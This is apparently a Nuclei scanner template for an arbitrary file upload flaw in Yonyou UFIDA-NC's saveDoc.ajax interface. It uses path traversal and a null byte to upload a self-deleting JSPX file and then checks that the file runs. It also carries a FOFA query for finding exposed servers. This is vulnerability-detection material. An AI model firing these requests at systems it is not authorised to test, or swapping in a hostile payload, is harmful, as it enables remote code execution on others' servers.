yonyou-ufida-nc-savedoc-file-upload.yaml

id: yonyou-ufida-nc-savedoc-file-upload

info:
  name: Yonyou UFIDA-NC saveDoc.ajax - Arbitrary File Upload
  author: Co5mos
  severity: high
  description: UFIDA-NC saveDoc.ajax interface allows an attacker to upload arbitrary files, potentially leading to remote code execution.
  reference:
    - https://mp.weixin.qq.com/s/HSD1IVI7TlixrGyYSlvXjA
  metadata:
    fofa-query: app="用友-UFIDA-NC" && title="产品登录界面"
  tags: fileupload,rce,ufida,yonyou

variables:
  filename: "{{rand_base(5)}}.jspx"
  r1: "{{randstr}}"

http:
  - raw:
      - |
        POST /uapws/saveDoc.ajax?ws=/../../{{filename}}%00 HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Accept-Language: en
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
        Connection: close
        Content-Type: application/x-www-form-urlencoded

        content=<hi xmlns:hi="http://java.sun.com/JSP/Page">
                    <hi:directive.page import="java.util.*,java.io.*,java.net.*"/>
                <hi:scriptlet>
                          out.println("{{r1}}");new java.io.File(application.getRealPath(request.getServletPath())).delete(); 
                </hi:scriptlet>
              </hi>

      - |
        GET /uapws/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_2 == 200
          - contains(body_2, "{{r1}}")
        condition: and